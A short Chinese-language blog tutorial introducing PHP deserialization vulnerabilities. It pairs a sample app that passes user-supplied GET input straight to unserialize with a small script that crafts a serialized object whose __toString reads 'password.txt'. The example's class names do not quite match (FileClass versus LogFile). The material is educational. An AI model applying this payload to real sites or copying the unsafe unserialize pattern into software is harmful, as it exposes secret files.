ReZero's Utopia.

php 反序列化漏洞概览

字数统计: 396阅读时长: 1 min
2017/04/23 Share

个人感觉参数可控是很多安全问题的根源 php反序列化漏洞原链接 序列化是啥 就理解成方便数据运输做的一种压缩优化就行 比方说一个

$stooges = array('Moe','Larry','Curly');
$new = serialize($stooges);
print_r($new);
echo "<br />";
print_r(unserialize($new));
结果:
a:3:{i:0;s:3:"Moe";i:1;s:5:"Larry";i:2;s:5:"Curly";}

可以看出来乱七八糟的对象最终简化为字符串 所以可以猜出来咋用了
就是构造语句进行序列化
然后在对应进行反序列化的接口
利用变量可控性执行命令 这个过程中
两个比较注意的地方
一个是
魔术方法 即通过反序列化调用生成对象执行析构函数等
利用接口对应变量的不安全权限
对构造析构toString等方法进行利用 比如web Application 源码如下

<?php
include 'logfile.php';
class FileClass    
{    
    public $filename = 'error.log';      
    public function __toString()    
    {    
        return file_get_contents($this->filename);    
    }    
} 
class User    
{    
    public $age = 0;    
    public $name = '';    
    public function __toString()    
    {    
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
    }    
}
$obj = unserialize($_GET['usr_serialized']);
echo $obj;
?>

则可构造利用代码如下生成请求命令

<?php    
include 'logfile.php';    
$obj = new LogFile();    
$obj->filename = 'password.txt';    
echo serialize($obj) . '<br />';   
?> 

可见这个例子利用了logfile中filename的低权限接口
通过反序列化调用了新对象toString接口
从而打印了password.txt 的内容

CATALOG